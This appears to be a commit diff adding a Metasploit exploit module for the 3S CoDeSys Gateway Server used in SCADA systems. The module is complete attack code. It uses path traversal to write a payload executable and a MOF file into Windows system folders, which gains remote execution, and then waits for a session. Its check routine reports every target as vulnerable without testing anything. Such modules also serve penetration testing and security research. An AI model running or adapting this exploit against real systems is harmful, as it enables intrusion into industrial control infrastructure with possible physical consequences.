|
| 1 | +#!/usr/bin/env ruby |
| 2 | + |
| 3 | +require 'msf/core' |
| 4 | +class Metasploit3 < Msf::Exploit::Remote |
| 5 | + |
| 6 | + Rank = ExcellentRanking |
| 7 | + include Msf::Exploit::EXE |
| 8 | + include Msf::Exploit::FileDropper |
| 9 | + include Msf::Exploit::Remote::Tcp |
| 10 | + include Msf::Exploit::WbemExec |
| 11 | + |
| 12 | + def initialize(info = {}) |
| 13 | + super(update_info(info, |
| 14 | + 'Name' => 'SCADA 3S CoDeSys Gateway Server Remote Execution', |
| 15 | + 'Description' => %q{ |
| 16 | + This module exploits arbitrary file creation to execute a mof file |
| 17 | + gaining remote execution within the SCADA system |
| 18 | + }, |
| 19 | + 'Author' => |
| 20 | + [ |
| 21 | + 'Aaron Portnoy <[email protected]>', |
| 22 | + 'Enrique Sanchez <[email protected]>' |
| 23 | + ], |
| 24 | + 'License' => 'MSF_LICENSE', |
| 25 | + 'References' => |
| 26 | + [ |
| 27 | + ['Exodus Intel Training', '02-2013'] |
| 28 | + ], |
| 29 | + 'Platform' => 'win', |
| 30 | + 'Targets' => |
| 31 | + [ |
| 32 | + ['Windows Universal', { }] |
| 33 | + ], |
| 34 | + 'DefaultTarget' => 0 |
| 35 | + )) |
| 36 | + |
| 37 | + register_options( |
| 38 | + [ |
| 39 | + Opt::RPORT(1211), |
| 40 | + ], self.class |
| 41 | + ) |
| 42 | + end |
| 43 | + |
| 44 | + def check |
| 45 | + return Exploit::CheckCode::Vulnerable |
| 46 | + end |
| 47 | + |
| 48 | + ## |
| 49 | + # upload_file(remote_filepath, remote_filename, local_filedata) |
| 50 | + # |
| 51 | + # remote_filepath: Remote filepath where the file will be uploaded |
| 52 | + # remote_filename: Remote name of the file to be executed ie. boot.ini |
| 53 | + # local_file: File containing the read data for the local file to be uploaded, actual open/read/close done in exploit() |
| 54 | + |
| 55 | + def upload_file(remote_filepath, remote_filename, local_filedata = null) |
| 56 | + magic_code = "\xdd\xdd" |
| 57 | + opcode = [6].pack('L') |
| 58 | + |
| 59 | + # We create the filepath for the upload, for execution it should be \windows\system32\wbem\mof\<file with extension mof! |
| 60 | + file = "..\\..\\" << remote_filepath << remote_filename << "\x00" |
| 61 | + print_debug("File to upload: #{file}") |
| 62 | + pkt_size = local_filedata.size() + file.size() + (0x108 - file.size()) + 4 |
| 63 | + print_debug(pkt_size) |
| 64 | + |
| 65 | + # Magic_code + packing + size |
| 66 | + pkt = magic_code << "AAAAAAAAAAAA" << [pkt_size].pack('L') |
| 67 | + |
| 68 | + tmp_pkt = opcode << file |
| 69 | + tmp_pkt += "\x00"*(0x108 - tmp_pkt.size) << [local_filedata.size].pack('L') << local_filedata |
| 70 | + pkt << tmp_pkt |
| 71 | + |
| 72 | + print_status("Starting upload of file #{remote_filename}") |
| 73 | + connect |
| 74 | + sock.put(pkt) |
| 75 | + disconnect |
| 76 | + |
| 77 | + print_status("File uploaded") |
| 78 | + end |
| 79 | + |
| 80 | + def remove_file |
| 81 | + end |
| 82 | + |
| 83 | + def read_file |
| 84 | + end |
| 85 | + |
| 86 | + def exploit |
| 87 | + print_status("- Attempting to communicate with SCADA system #{rhost} on port #{rport}") |
| 88 | + |
| 89 | + # We create an exe payload, we have to get remote execution in 2 steps |
| 90 | + exe = generate_payload_exe |
| 91 | + exe_name = Rex::Text::rand_text_alpha(8) + ".exe" |
| 92 | + upload_file("windows\\system32\\", exe_name, exe) |
| 93 | + |
| 94 | + # We create the mof file and upload (second step) |
| 95 | + mof_name = Rex::Text::rand_text_alpha(8) + ".mof" |
| 96 | + mof = generate_mof(mof_name, exe_name) |
| 97 | + upload_file("WINDOWS\\system32\\wbem\\mof\\", mof_name, mof) |
| 98 | + |
| 99 | + print_status("Everything is ready, waiting for a session ... ") |
| 100 | + handler |
| 101 | + |
| 102 | + #Taken from the spooler exploit writen byt jduck and HDMoore |
| 103 | + cnt = 1 |
| 104 | + while session_created? == false and cnt < 25 |
| 105 | + ::IO.select(nil, nil, nil, 0.25) |
| 106 | + cnt += 1 |
| 107 | + end |
| 108 | + end |
| 109 | +end |
0 commit comments